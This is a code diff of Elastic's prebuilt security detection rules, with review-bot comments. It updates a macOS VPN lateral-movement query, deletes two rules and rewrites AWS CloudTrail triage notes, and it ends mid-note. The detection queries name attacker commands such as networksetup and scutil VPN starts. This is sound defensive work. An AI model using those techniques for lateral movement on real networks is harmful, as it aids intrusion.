+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_vpn_connection_attempt.json
@@ -2,7 +2,7 @@
 "author": [
 "Elastic"
 ],
- "description": "Identifies the execution of macOS built-in commands to connect to an existing Virtual Private Network (VPN).",
+ "description": "Identifies the execution of macOS built-in commands to connect to an existing Virtual Private Network (VPN). Adversaries may use VPN connections to laterally move and control remote systems on a network.",
 "from": "now-9m",
 "index": [
 "auditbeat-*",
@@ -11,15 +11,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Virtual Private Network Connection Attempt", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n (\n (process.name : \"networksetup\" and process.args : \"-connectpppoeservice\") or\n (process.name : \"scutil\" and process.args : \"--nc\" and process.args : \"start\") or\n (process.name : \"osascript\" and process.command_line : \"osascript*set VPN to service*\")\n )\n", "references": [ "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/osx/manage/vpn.rb", "https://www.unix.com/man-page/osx/8/networksetup/", "https://superuser.com/questions/358513/start-configured-vpn-from-command-line-osx" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "15dacaa0-5b90-466b-acab-63435a59701a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -47,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_process_started_in_temp_directory.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_process_started_in_temp_directory.json deleted file mode 100644 index 07dc8f663201b..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_process_started_in_temp_directory.json +++ /dev/null @@ -1,30 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies processes running in a temporary folder. This is sometimes done by adversaries to hide malware.", - "false_positives": [ - "Build systems, like Jenkins, may start processes in the `/tmp` directory. These can be exempted by name or by username." - ], - "from": "now-9m", - "index": [ - "auditbeat-*", - "logs-endpoint.events.*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Unusual Process Execution - Temp", - "query": "event.category:process and event.type:(start or process_started) and process.working_directory:/tmp and\n not process.parent.name:(update-motd-updates-available or\n apt or apt-* or\n cnf-update-db or\n appstreamcli or\n unattended-upgrade or\n packagekitd) and\n not process.args:(/usr/lib/update-notifier/update-motd-updates-available or\n /var/lib/command-not-found/)\n", - "risk_score": 47, - "rule_id": "df959768-b0c9-4d45-988c-5606a2be8e5a", - "severity": "medium", - "tags": [ - "Elastic", - "Host", - "Linux", - "Threat Detection" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 8 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/mfa_disabled_for_google_workspace_organization.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/mfa_disabled_for_google_workspace_organization.json deleted file mode 100644 index fb8130b9fed7a..0000000000000 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/mfa_disabled_for_google_workspace_organization.json
+++ /dev/null
@@ -1,34 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Detects when multi-factor authentication (MFA) is disabled for a Google Workspace organization. An adversary may attempt to modify a password policy in order to weaken an organization\u2019s security controls.", - "false_positives": [ - "MFA settings may be modified by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-130m", - "index": [ - "filebeat-*", - "logs-google_workspace*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "MFA Disabled for Google Workspace Organization", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", - "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:(ENFORCE_STRONG_AUTHENTICATION or ALLOW_STRONG_AUTHENTICATION) and google_workspace.admin.new_value:false\n", - "risk_score": 47, - "rule_id": "e555105c-ba6d-481f-82bb-9b633e7b4827", - "severity": "medium", - "tags": [ - "Elastic", - "Cloud", - "Google Workspace", - "Continuous Monitoring", - "SecOps", - "Identity and Access" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 13 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_error_message_spike.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_error_message_spike.json index c190c112ead30..2d2a7d14f71a1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_error_message_spike.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_error_message_spike.json 
@@ -12,12 +12,14 @@ "license": "Elastic License v2", "machine_learning_job_id": "high_distinct_count_error_message", "name": "Spike in AWS Error Messages", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n## Triage and analysis\n\n### Investigating Spikes in CloudTrail Errors\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and understanding\nwhat is considered normal behavior within an organization, you can spot suspicious or malicious activity when deviations\noccur. This example rule triggers from a large spike in the number of CloudTrail log messages that contain a particular\nerror message. The error message in question was associated with the response to an AWS API command or method call, this\nhas the potential to uncover unknown threats or activity.\n\n#### Possible investigation steps:\n- Examine the history of the error. Has it manifested before? If the error, which is visible in the `aws.cloudtrail.error_message` field, only manifested recently, it might be related to recent changes in an automation module or script.\n- Examine the request parameters. These may provide indications as to the nature of the task being performed when the error occurred. Is the error related to unsuccessful attempts to enumerate or access objects, data, or secrets? If so, this can sometimes be a byproduct of discovery, privilege escalation or lateral movement attempts.\n- Consider the user as identified by the `user.name field`. Is this activity part of an expected workflow for the user context? Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context. 
The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Consider the source IP address and geolocation for the calling user who issued the command. Do they look normal for the calling user? If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts, or could it be sourcing from an EC2 instance that's not under your control? If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n\n### False Positive Analysis\n- This rule has the possibility to produce false positives based on unexpected activity occurring such as bugs or recent\nchanges to automation modules or scripting.\n- The adoption of new services or the addition of new functionality to scripts may generate false positives.\n\n### Related Rules\n- Unusual AWS Command for a User\n- Rare AWS Error Code\n\n### Response and Remediation\n- If suspicious or malicious activity is observed, immediately rotate and delete relevant AWS IAM access keys.\n- If any unauthorized new user accounts were created, remove them. Request password resets for other IAM users.\n- Look into enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n", + "note": "## Triage and analysis\n\n### Investigating Spike in AWS Error Messages\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and\nunderstanding what is considered normal behavior within an organization, you can spot suspicious or malicious activity\nwhen deviations occur.\n\nThis rule uses a machine learning job to detect a significant spike in the rate of a particular error in the CloudTrail\nmessages. 
Spikes in error messages may accompany attempts at privilege escalation, lateral movement, or discovery.\n\n#### Possible investigation steps\n\n- Examine the history of the error. If the error only manifested recently, it might be related to recent changes in an\nautomation module or script. You can find the error in the `aws.cloudtrail.error_code field` field.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, or network administrator activity.\n- Examine the request parameters. These may indicate the source of the program or the nature of the task being performed\nwhen the error occurred.\n - Check whether the error is related to unsuccessful attempts to enumerate or access objects, data, or secrets.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. If the user is a human (not a program or script), did the activity take place during a normal\ntime of day?\n- Contact the account owner and confirm whether they are aware of this activity if suspicious.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- Examine the history of the command. If the command only manifested recently, it might be part of a new automation\nmodule or script. 
If it has a consistent cadence (for example, it appears in small numbers on a weekly or monthly cadence),\nit might be part of a housekeeping or maintenance process. You can find the command in the `event.action field` field.\n- The adoption of new services or the addition of new functionality to scripts may generate false positives.\n\n### Related Rules\n\n- Unusual City For an AWS Command - 809b70d3-e2c3-455e-af1b-2626a5a1a276\n- Unusual Country For an AWS Command - dca28dee-c999-400f-b640-50a081cc0fd1\n- Unusual AWS Command for a User - ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1\n- Rare AWS Error Code - 19de8096-e2b0-4bd8-80c9-34a820813fff\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], + "related_integrations": [], "risk_score": 21, "rule_id": "78d3d8d9-b476-451d-a9e0-7a5addd70670", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -26,5 +28,5 @@ "ML" ], "type": "machine_learning", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_error_code.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_error_code.json index d9e2b3e358760..3552fa621db0c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_error_code.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_error_code.json 
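Review bot: The rewritten `note` in this hunk points analysts at the wrong field for this rule: the removed text named `aws.cloudtrail.error_message`, which matches the job `high_distinct_count_error_message`, while the new text says the error is found in the `aws.cloudtrail.error_code field` field, a sentence that reads as copied from the Rare AWS Error Code rule. That sentence also places the word field inside the code span and then repeats it, and the same doubled-word pattern appears with `event.action field` in the false-positive section here and again in the ml_cloudtrail_rare_error_code and ml_cloudtrail_rare_method_by_city hunks that follow; suggested wording is "You can find the error in the `aws.cloudtrail.error_message` field." and "You can find the command in the `event.action` field." Separately, `"related_integrations": []` is added empty while the new `setup` string states that the AWS Fleet integration is required; if that field is meant to declare the rule's integration dependency, it should presumably list the AWS package rather than stay empty, here and in the three following hunks.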
@@ -12,12 +12,14 @@ "license": "Elastic License v2", "machine_learning_job_id": "rare_error_code", "name": "Rare AWS Error Code", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n## Triage and analysis\n\nInvestigating Unusual CloudTrail Error Activity ###\nDetection alerts from this rule indicate a rare and unusual error code that was associated with the response to an AWS API command or method call. Here are some possible avenues of investigation:\n- Examine the history of the error. Has it manifested before? If the error, which is visible in the `aws.cloudtrail.error_code field`, only manifested recently, it might be related to recent changes in an automation module or script.\n- Examine the request parameters. These may provide indications as to the nature of the task being performed when the error occurred. Is the error related to unsuccessful attempts to enumerate or access objects, data, or secrets? If so, this can sometimes be a byproduct of discovery, privilege escalation, or lateral movement attempts.\n- Consider the user as identified by the `user.name` field. Is this activity part of an expected workflow for the user context? Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context. The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Consider the source IP address and geolocation for the calling user who issued the command. Do they look normal for the calling user? If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts, or could it be sourcing from an EC2 instance that's not under your control? 
If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?", + "note": "## Triage and analysis\n\n### Investigating Rare AWS Error Code\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and\nunderstanding what is considered normal behavior within an organization, you can spot suspicious or malicious activity\nwhen deviations occur.\n\nThis rule uses a machine learning job to detect an unusual error in a CloudTrail message. This can be byproducts of\nattempted or successful persistence, privilege escalation, defense evasion, discovery, lateral movement, or collection.\n\nDetection alerts from this rule indicate a rare and unusual error code that was associated with the response to an AWS\nAPI command or method call.\n\n#### Possible investigation steps\n\n- Examine the history of the error. If the error only manifested recently, it might be related to recent changes in an\nautomation module or script. You can find the error in the `aws.cloudtrail.error_code field` field.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, or network administrator activity.\n- Examine the request parameters. 
These may indicate the source of the program or the nature of the task being performed\nwhen the error occurred.\n - Check whether the error is related to unsuccessful attempts to enumerate or access objects, data, or secrets.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. If the user is a human (not a program or script), did the activity take place during a normal\ntime of day?\n- Contact the account owner and confirm whether they are aware of this activity if suspicious.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- Examine the history of the command. If the command only manifested recently, it might be part of a new automation\nmodule or script. If it has a consistent cadence (for example, it appears in small numbers on a weekly or monthly cadence),\nit might be part of a housekeeping or maintenance process. 
You can find the command in the `event.action field` field.\n- The adoption of new services or the addition of new functionality to scripts may generate false positives.\n\n### Related Rules\n\n- Unusual City For an AWS Command - 809b70d3-e2c3-455e-af1b-2626a5a1a276\n- Unusual Country For an AWS Command - dca28dee-c999-400f-b640-50a081cc0fd1\n- Unusual AWS Command for a User - ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1\n- Spike in AWS Error Messages - 78d3d8d9-b476-451d-a9e0-7a5addd70670\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], + "related_integrations": [], "risk_score": 21, "rule_id": "19de8096-e2b0-4bd8-80c9-34a820813fff", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -26,5 +28,5 @@ "ML" ], "type": "machine_learning", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_city.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_city.json index a3d6208eb9f05..cfb1d153c5555 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_city.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_city.json 
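Review bot: The overview sentence added to this rule's `note`, `This can be byproducts of attempted or successful persistence, privilege escalation, ...`, pairs a singular subject with a plural complement. Either `These can be byproducts of` or `This can be a byproduct of` reads correctly; since the note is what an analyst sees on the alert, it is worth fixing before the rule ships.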
@@ -12,12 +12,14 @@ "license": "Elastic License v2", "machine_learning_job_id": "rare_method_for_a_city", "name": "Unusual City For an AWS Command", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n## Triage and analysis\n\n### Investigating an Unusual CloudTrail Event\nDetection alerts from this rule indicate an AWS API command or method call that is rare and unusual for the geolocation of the source IP address. Here are some possible avenues of investigation:\n- Consider the source IP address and geolocation for the calling user who issued the command. Do they look normal for the calling user? If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts, or could it be sourcing from an EC2 instance that's not under your control? If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the user as identified by the `user.name` field. Is this command part of an expected workflow for the user context? Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context. The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Consider the time of day. If the user is a human, not a program or script, did the activity take place during a normal time of day?\n- Examine the history of the command. If the command, which is visible in the `event.action field`, only manifested recently, it might be part of a new automation module or script. 
If it has a consistent cadence (for example, if it appears in small numbers on a weekly or monthly cadence), it might be part of a housekeeping or maintenance process.\n- Examine the request parameters. These may provide indications as to the source of the program or the nature of the tasks it is performing.", + "note": "## Triage and analysis\n\n### Investigating Unusual City For an AWS Command\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and\nunderstanding what is considered normal behavior within an organization, you can spot suspicious or malicious activity\nwhen deviations occur.\n\nThis rule uses a machine learning job to detect an AWS API command that while not inherently suspicious or abnormal, is\nsourcing from a geolocation (city) that is unusual for the command. This can be the result of compromised credentials or\nkeys used by a threat actor in a different geography than the authorized user(s).\n\nDetection alerts from this rule indicate an AWS API command or method call that is rare and unusual for the geolocation\nof the source IP address.\n\n#### Possible investigation steps\n\n- Identify the user account involved and the action performed. Verify whether it should perform this kind of action.\n - Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the \n `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context.\n - The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, or network administrator activity.\n- Examine the request parameters. 
These might indicate the source of the program or the nature of its tasks.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. If the user is a human (not a program or script), did the activity take place during a normal\ntime of day?\n- Contact the account owner and confirm whether they are aware of this activity if suspicious.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- False positives can occur if activity is coming from new employees based in a city with no previous history in AWS.\n- Examine the history of the command. If the command only manifested recently, it might be part of a new automation\nmodule or script. If it has a consistent cadence (for example, it appears in small numbers on a weekly or monthly cadence),\nit might be part of a housekeeping or maintenance process. 
You can find the command in the `event.action field` field.\n\n### Related Rules\n\n- Unusual Country For an AWS Command - dca28dee-c999-400f-b640-50a081cc0fd1\n- Unusual AWS Command for a User - ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1\n- Rare AWS Error Code - 19de8096-e2b0-4bd8-80c9-34a820813fff\n- Spike in AWS Error Messages - 78d3d8d9-b476-451d-a9e0-7a5addd70670\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], + "related_integrations": [], "risk_score": 21, "rule_id": "809b70d3-e2c3-455e-af1b-2626a5a1a276", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -26,5 +28,5 @@ "ML" ], "type": "machine_learning", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_country.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_country.json index 7e778083c9d70..b29b6d89ed5c1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_country.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_country.json 
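Review bot: Two small wording defects in the new `note` for this rule: the overview sentence `an AWS API command that while not inherently suspicious or abnormal, is sourcing from a geolocation (city)` is missing the comma before `while` (`a command that, while not inherently suspicious or abnormal, is sourcing ...`), and the first investigation sub-bullet has a stray space before its line break (`the access key ID in the \n`), which renders as a hanging space in the Markdown. Both are cosmetic, but this text is the analyst-facing guidance attached to every alert from the rule.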
@@ -12,12 +12,14 @@ "license": "Elastic License v2", "machine_learning_job_id": "rare_method_for_a_country", "name": "Unusual Country For an AWS Command", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n## Triage and analysis\n\n### Investigating an Unusual Country For an AWS Command\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and understanding\nwhat is considered normal behavior within an organization, suspicious or malicious activity can be spotted when deviations\nare observed. This example rule focuses on AWS command activity where the country from the source of the activity has been\nconsidered unusual based on previous history.\n\n#### Possible investigation steps:\n- Consider the source IP address and geolocation for the calling user who issued the command. Do they look normal for the calling user? If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts, or could it be sourcing from an EC2 instance that's not under your control? If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the user as identified by the `user.name` field. Is this command part of an expected workflow for the user context? Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context. The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Consider the time of day. If the user is a human, not a program or script, did the activity take place during a normal time of day?\n- Examine the history of the command. 
If the command, which is visible in the `event.action field`, only manifested recently, it might be part of a new automation module or script. If it has a consistent cadence (for example, if it appears in small numbers on a weekly or monthly cadence), it might be part of a housekeeping or maintenance process.\n- Examine the request parameters. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n\n### False Positive Analysis\n- False positives can occur if activity is coming from new employees based in a country with no previous history in AWS,\ntherefore it's important to validate the activity listed in the investigation steps above.\n\n### Related Rules\n- Unusual City For an AWS Command\n- Unusual AWS Command for a User\n- Rare AWS Error Code\n\n### Response and Remediation\n- If suspicious or malicious activity is observed, immediately rotate and delete relevant AWS IAM access keys.\n- Validate if any unauthorized new users were created, remove these accounts and request password resets for other IAM users.\n- Look into enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Country For an AWS Command\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and\nunderstanding what is considered normal behavior within an organization, you can spot suspicious or malicious activity\nwhen deviations occur.\n\nThis rule uses a machine learning job to detect an AWS API command that while not inherently suspicious or abnormal, is\nsourcing from a geolocation (country) that is unusual for the command. 
This can be the result of compromised credentials\nor keys used by a threat actor in a different geography than the authorized user(s).\n\nDetection alerts from this rule indicate an AWS API command or method call that is rare and unusual for the geolocation\nof the source IP address.\n\n#### Possible investigation steps\n\n- Identify the user account involved and the action performed. Verify whether it should perform this kind of action.\n - Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the \n `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context.\n - The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, or network administrator activity.\n- Examine the request parameters. These might indicate the source of the program or the nature of its tasks.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. 
If the user is a human (not a program or script), did the activity take place during a normal\ntime of day?\n- Contact the account owner and confirm whether they are aware of this activity if suspicious.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False Positive Analysis\n\n- False positives can occur if activity is coming from new employees based in a country with no previous history in AWS.\n- Examine the history of the command. If the command only manifested recently, it might be part of a new automation\nmodule or script. If it has a consistent cadence (for example, it appears in small numbers on a weekly or monthly cadence),\nit might be part of a housekeeping or maintenance process. You can find the command in the `event.action field` field.\n\n### Related Rules\n\n- Unusual City For an AWS Command - 809b70d3-e2c3-455e-af1b-2626a5a1a276\n- Unusual AWS Command for a User - ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1\n- Rare AWS Error Code - 19de8096-e2b0-4bd8-80c9-34a820813fff\n- Spike in AWS Error Messages - 78d3d8d9-b476-451d-a9e0-7a5addd70670\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the 